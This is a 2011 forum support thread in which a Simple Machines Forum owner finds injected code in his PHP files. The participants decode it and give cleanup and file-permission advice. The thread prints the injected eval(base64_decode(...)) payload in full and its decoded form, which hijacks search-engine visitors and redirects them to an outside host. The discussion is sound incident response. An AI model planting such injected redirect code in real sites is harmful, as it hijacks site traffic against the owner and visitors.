News:

Wondering if this will always be free?  See why free is better.

Main Menu

 at the beginning of php files

Started by T3CHN0, September 19, 2011, 08:09:04 AM

Previous topic - Next topic

T3CHN0

Hello


Can anyone tell me what this is in front of my php files.
Display.template.php and load.php so far that's the php files I have noticed it.




<?php
/**
 * Simple Machines Forum (SMF)



I am going to remove it so it looks like this




<?php
/**
 * Simple Machines Forum (SMF)



I hope I don't get any problems doing so.
but please anyone let me know if 


should it be in my files


cheers

emanuele

No, it shouldn't be in your files at all.
It's fine to remove these chars.

Did you by install any mod?


Take a peek at what I'm doing! ;D




Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

T3CHN0

Hello
Yes I have installed many mods, My forum was attacked by a leaching rouge and all my files had
something like this at the beginning of each php file

eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQo
direcly after <?php

I upgraded my site from 2.0 rc3 to 2.0 last week but was attacked again 2 days after.
so I rebuild the hole 2.0 forum again fresh with new install but after removing


within about 30minutes later I noticed files started having the
eval(base64_decode(
again and not long after every php file I edit was leached again.

I have turned on with my host leach security to try stop this from happening again
but any other idea's to protect my site would be appreciated


at this point in time I am going over every file in my forum 1 by 1 and removing the leach string
to try and recover my forum without having to rebuild another time.


cheers

kat

Maybe... This?

http://custom.simplemachines.org/mods/index.php?mod=2815

I'm curious as to how they keep getting in, though.

Has your host checked their access logs and stuff?

Are they a good host?

T3CHN0

Thankyou so much for that link to firewall mod, never thought of searching for a firewall mod

I'm with bluehost and I have never had a problem with them in the passed.
good speeds and allot of room for data.


they probably haven't checked access logs and stuff, am I able to do it?

how they keep getting in "Well only a matter of time before a hack is made" that's what we can expect
with anything in our days. I don't know how but it keeps getting in.

I do set all my files permissions to 755 - would that allow access?

here is the complete leach string and anyone knows how to decode it and find out where it's directed at

eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsNCmlmICghJHFhenBsbSl7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmICgkdWFnKSB7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wcnNuYnJrLm9zYS5wbC8iKTsNCglleGl0KCk7DQp9DQp9DQoJfQ0KCX0="));

MrPhil

Change "eval" to "print" and it should display the code inside, rather than running it. You probably won't like what you see, but it might give you a hint as to how they're getting in. Not only should you clean up all SMF files, but erase all other files on your site that you can't account for. Scan all PCs used to administer your site for spyware and viruses (especially keystroke loggers and password sniffers). Then change all passwords -- FTP, site control panel, SMF admin IDs, etc. Talk to your host about access logs and see if they can see someone getting in.

T3CHN0

Thanks.
I will do all of what you said.


by the way, where would I put the string with print to see anything.
in a empty php file?

T3CHN0

don't know if this info is any good.
but cleaning my files and i'm back in my themes/default folder and see  is back in my Display.template.php file
that means what ever it is will keep coming back.


How do I stop that happening?

kat

QuoteI do set all my files permissions to 755 - would that allow access?

I believe that is like having a big notice on your site saying "Please hack me!". (Well, not quite that bad, but...)

Go to Admin>Packages>File permissions.

Set that to "Standard" and I think you'll be better off.

Illori

K@ no, 777 is world write/readable 755 is not.

kat

Yeah, I know.

Would you leave your forum with every file at 775, though?

Illori

they said 755 not 775, 755 is REQUIRED by many servers that are more _secure_. 755 keeps others from being able to view your folders, but files need to be 644 not 755.

MrPhil

Quote from: techno489 on September 19, 2011, 12:59:24 PM
by the way, where would I put the string with print to see anything.
in a empty php file?

<?php
print(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsNCmlmICghJHFhenBsbSl7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmICgkdWFnKSB7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wcnNuYnJrLm9zYS5wbC8iKTsNCglleGl0KCk7DQp9DQp9DQoJfQ0KCX0="));
?>


MrPhil

Quote from: Illori on September 19, 2011, 02:24:07 PM
they said 755 not 775, 755 is REQUIRED by many servers that are more _secure_. 755 keeps others from being able to view your folders, but files need to be 644 not 755.
K@ needs a new pair of reading glasses...

kat

You're right, there.

I DID read it as 775.

I blame Runic for late nights in wet fields. ;)

T3CHN0

#15
Quote from: Illori on September 19, 2011, 02:24:07 PM
755 keeps others from being able to view your folders, but files need to be 644 not 755.
So simply, all folders should be 755 and all php files 644


I still can't Go to Admin>Packages>File permissions. to set file permission as my forum is still down.
I will do the permissions my self.

I have almost finished removing all leaches and will put my new user name and password
into settings soon to test it and see if my forum is working again.

T3CHN0

Quote from: MrPhil on September 19, 2011, 02:30:09 PM
Quote from: techno489 on September 19, 2011, 12:59:24 PM
by the way, where would I put the string with print to see anything.
in a empty php file?

<?php
print(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsNCmlmICghJHFhenBsbSl7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmICgkdWFnKSB7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpew0KCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wcnNuYnJrLm9zYS5wbC8iKTsNCglleGl0KCk7DQp9DQp9DQoJfQ0KCX0="));
?>




I did this and this is what I got.
means nothing to me


error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer,"yandex") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"baidu.com") or stristr($referer,"doubleclick.net") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or stristr($referer,"clickbank.net") or stristr($referer,"blogspot.com") or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://prsnbrk.osa.pl/"); exit(); } } } }


Well I did everything said. forum firewall installed and forum back up and running with all leaching removed.
I will monitor my site as always and if anything happens like this again I will reply
and post to the thread if that's ok


cheers

MrPhil

Quote from: techno489 on September 20, 2011, 01:15:24 AM
I did this and this is what I got.
means nothing to me
It means that if any of many popular search engines sent someone to your site, what they will see is some Polish site instead. You've been hijacked.

T3CHN0

WOW. thanks for that... hopefully with forum firewall mod,  Bad Behavior mod, stop spammers mod, and leach protection from
my host that none of this will happen again...

Illori

that will only work if the code you are using is secure and your server is secure. those mods alone will not stop hackers.

Advertisement: